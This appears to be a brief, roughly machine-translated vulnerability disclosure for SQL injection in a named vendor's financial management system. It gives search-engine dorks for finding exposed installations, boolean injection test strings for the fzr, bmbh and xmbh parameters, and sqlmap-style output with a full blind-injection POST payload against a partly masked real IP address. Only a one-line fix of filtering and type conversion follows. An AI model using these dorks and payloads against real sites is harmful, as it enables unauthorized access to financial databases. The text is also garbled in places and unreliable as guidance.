SQL Injection and solution for a financial management system in shenzhouhaotian
Google inurl: xm_zhuce.aspx
Or
Baidu or Google Great-Chn
Or content. aspx? Lb = dl
Vulnerability files:
Xm_zhuce.aspx
Simple judgment:
DropDownList1=gxzhcx&bmbh=1&xmbh=2&fzr=3' or '1'='1&pwd1=4&pwd2=4
DropDownList1=gxzhcx&bmbh=1&xmbh=2&fzr=3' or '1'='2&pwd1=4&pwd2=4
In addition
http://222.206.2XX.75/xm_zhuce.aspx
Place: POST
Parameter: fzr
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTM3NzYyMTE0OGR
kN3CduEi0KLd3vBgmXUu9+bmY+8Y=&__VIEWSTATEGENERATOR=2C9BDDA5&__EVENTVALIDATION=/w
EWCwLOu8+rAgKM54rGBgK7q7GGCAKbvu/vBgLnqrLLBwKI3NSmDQL+xp2pBAKYx52pBALKs+yXBQLGmf
2HCALGmemsD8y55BmO8Kl+GFBZlOrv8LXqpMCh&Button2=%CC%E1%BD%BB&DropDownList1=gxzhcx
&bmbh=1&xmbh=2&fzr=' or '1'='1 ' AND 1543=1543 AND 'eOUS'='eOUS&pwd1=4&pwd2=4
Solution:
Bmbh = 1 & xmbh = 2 & fzr = 1
All three parameters have problems.
Both must be well filtered, And the type needs to be converted forcibly
You can determine.
'Or 1 = 2 --
'Or 1 = 1 --